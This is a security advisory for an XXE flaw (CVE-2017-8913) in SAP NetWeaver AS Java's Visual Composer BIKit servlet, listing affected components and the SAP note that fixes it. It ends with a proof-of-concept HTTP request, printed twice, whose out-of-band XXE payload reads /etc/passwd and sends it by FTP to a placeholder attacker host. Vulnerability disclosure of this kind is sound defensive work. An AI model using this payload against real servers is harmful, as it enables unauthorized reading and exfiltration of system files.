Application: SAP NetWeaver **Versions Affected:**SAP NetWeaver AS JAVA 7.5 Vendor URL: SAP **Bugs:**XXE **Reported:**17.06.2016 **Vendor response:**18.06.2016 **Date of Public Advisory:**14.02.2017 **Reference:**SAP Security Note 2386873 **Author: ** Mathieu Geli (ERPScan)
Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-8913
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | Low (L) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
A malicious user can modify an XML-based request to include XML content that is then parsed locally.
An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests, which will be processed by XML parser. An attacker can use an XML external entity vulnerability for getting unauthorized access to OS filesystem.
VCFLEX7.00
VCFRAMEWORK7.00
VC70RUNTIME7.30
VC70RUNTIME7.31
VC70RUNTIME7.40
VC70RUNTIME7.50
To correct this vulnerability, install SAP Security Note 2386873.
POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.BIKit.default HTTP/1.1 Host: 172.16.30.29:50000 User-Agent: curl/7.43.0 Accept: / Content-Type: xml;charset=UTF-8 Content-Length: 181 <?xml version=“1.0” encoding=“ISO-8859-1”?> <!DOCTYPE foo [ <!ENTITY % pe SYSTEM “http://ATTACKERIP/xxe_file”> %pe; %param1; <!ELEMENT foo (#PCDATA)> ]> &leak; and xxe_file is: <!ENTITY % payload SYSTEM “file:///etc/passwd”> <!ENTITY % param1 “<!ENTITY leak SYSTEM ‘ftp://attacker_ip:2121/%payload;’>”>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.BIKit.default HTTP/1.1
Host: 172.16.30.29:50000
User-Agent: curl/7.43.0
Accept: /
Content-Type: xml;charset=UTF-8
Content-Length: 181
<?xml version=“1.0” encoding=“ISO-8859-1”?>
<!DOCTYPE foo [
<!ENTITY % pe SYSTEM “http://ATTACKERIP/xxe_file”>
%pe;
%param1;
<!ELEMENT foo (#PCDATA)>
]>
&leak;
and xxe_file is:
<!ENTITY % payload SYSTEM “file:///etc/passwd”>
<!ENTITY % param1 “<!ENTITY leak SYSTEM ‘ftp://attacker_ip:2121/%payload;’>”>
—|—